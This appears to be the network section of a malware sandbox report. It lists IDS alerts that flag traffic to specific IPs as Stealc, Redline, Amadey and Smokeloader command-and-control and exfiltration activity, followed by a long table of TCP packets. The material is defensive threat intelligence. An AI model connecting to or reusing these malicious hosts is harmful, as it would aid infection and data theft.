2024-08-26T23:29:20.156947+0200	TCP	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	80	49733	185.215.113.17	192.168.2.7
2024-08-26T23:29:28.496746+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:29:19.763962+0200	TCP	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	49733	80	192.168.2.7	185.215.113.17
2024-08-26T23:29:27.079311+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:25.351820+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:25.855148+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:20.731975+0200	TCP	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	49733	80	192.168.2.7	185.215.113.17
2024-08-26T23:29:19.149929+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49734	80	192.168.2.7	185.215.113.16
2024-08-26T23:29:25.681938+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:29:22.116770+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:09.218666+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49723	80	192.168.2.7	185.215.113.16
2024-08-26T23:29:55.175302+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49766	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:14.903053+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49726	80	192.168.2.7	154.216.18.223
2024-08-26T23:29:25.620843+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:45.190048+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49743	80	192.168.2.7	185.215.113.16
2024-08-26T23:29:46.274562+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49744	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:23.275989+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49728	29257	192.168.2.7	95.179.163.21
2024-08-26T23:29:52.973908+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49762	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:52.973908+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49762	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:23.329566+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:29:22.861650+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:29:24.007747+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:29:25.479739+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:29:50.622687+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49758	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:50.622687+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49758	80	192.168.2.7	46.100.50.5
2024-08-26T23:29:27.745873+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49729	45580	192.168.2.7	65.21.18.51
2024-08-26T23:29:11.531615+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49724	80	192.168.2.7	185.215.113.16
2024-08-26T23:29:20.142345+0200	TCP	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	49733	80	192.168.2.7	185.215.113.17
2024-08-26T23:29:49.558693+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49755	80	192.168.2.7	46.100.50.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 26, 2024 23:29:07.926745892 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:07.931771040 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:07.931895971 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:07.932106972 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:07.936995029 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:08.693001986 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:08.695888996 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:08.698070049 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:08.703000069 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:08.970231056 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:08.970386028 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:08.972619057 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:08.977468014 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.218493938 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.218518019 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.218533993 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.218545914 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.218559980 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.218573093 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.218585014 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.218666077 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.218666077 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.218827009 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.218858004 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.218869925 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.218899012 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.218913078 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.218928099 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.218943119 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.219012976 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.223479986 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.223896027 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.368330002 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.368349075 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.368381023 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.368396044 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.368434906 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.368448019 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.368459940 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.368473053 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.368473053 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.368499041 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.368509054 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.368880033 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.368891954 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.368902922 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.368947983 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.368968964 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.369534969 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.369545937 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.369582891 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.369594097 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.369595051 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.369625092 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.369648933 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.369651079 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.369663000 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.369673014 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.369685888 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.369693995 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.369714975 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.369756937 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.370603085 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.370637894 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.370651960 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.370659113 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.370692968 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.370692968 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.370717049 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.370728970 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.370738983 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.370769978 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.370814085 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.371386051 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.371467113 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.371509075 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.373356104 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.373440027 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.518759012 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.518779039 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.518801928 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.518815994 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.518829107 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.518851042 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.518883944 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.518934965 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.518970966 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.519006014 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.519006968 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.519021988 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.519040108 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.519056082 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.519072056 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.519093990 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.519104958 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.519107103 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.519134045 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.519148111 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.519227028 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.519260883 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.519289017 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.519407988 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.519421101 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.519434929 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.519454002 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.519474030 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.519623041 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.519635916 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.519649029 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.519663095 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.519673109 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.519685030 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.519710064 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.519875050 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.519889116 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.519902945 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.519922018 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.519932985 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.519958973 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.520101070 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.520113945 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.520128965 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.520153046 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.520174026 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.520195961 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.520210028 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.520222902 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.520256042 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.520282984 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.520514965 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.520528078 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.520543098 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.520569086 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.520600080 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.520677090 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.520699024 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.520713091 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.520739079 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.520766973 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.520833969 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.520848036 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.520864010 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.520889044 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.520916939 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.520962954 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.520977974 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.520997047 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.521012068 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.521044016 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.521298885 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.521317959 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.521328926 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.521362066 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.521460056 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.521472931 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.521486998 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.521512032 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.521534920 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.521537066 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.521553040 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.521584034 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.523741961 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.523775101 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.523791075 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.523814917 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.523829937 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.609338999 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.612205029 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.668832064 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.668885946 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.668901920 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.668953896 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.668968916 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.668982983 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.668996096 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.668996096 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.669013023 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669049978 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.669092894 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.669099092 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669114113 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669127941 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669137955 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.669164896 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.669214010 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669229031 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669239998 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669255018 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669265032 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.669270039 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669281960 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.669286013 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669301033 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669312954 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.669313908 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669328928 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669344902 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.669364929 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.669770956 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669784069 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669805050 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669820070 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669831038 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.669832945 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669847965 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669857025 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.669872046 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669897079 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.669914961 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.669944048 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669965029 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669985056 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.669985056 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.670001030 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.670005083 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.670016050 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.670028925 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.670031071 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.670043945 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.670047045 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.670057058 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.670069933 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.670080900 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.670099974 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.670105934 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.670115948 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.670120001 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.670136929 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.670139074 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.670154095 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.670166016 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.670169115 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.670171976 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.670183897 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.670190096 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.670202017 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.670207977 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.670222044 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.670222998 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.670241117 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.670241117 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.670255899 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.670264959 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.670270920 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.670274019 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.670284986 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.670293093 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.670300961 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.670310020 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.670314074 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.670324087 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.670330048 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.670346975 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.670367002 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.676207066 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.676219940 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.676240921 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.676254988 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.676270008 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.676296949 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.676311016 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.676325083 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.676341057 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.676386118 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.676409960 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.676438093 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.676451921 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.676466942 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.676487923 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.676492929 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.676503897 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.676506042 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.676521063 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.676538944 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.676564932 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.676568985 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.676582098 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.676601887 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.676604033 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.676618099 CEST	80	49723	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:09.676620007 CEST	49723	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:09.676634073 CEST	80	49723	185.215.113.16	192.168.2.7
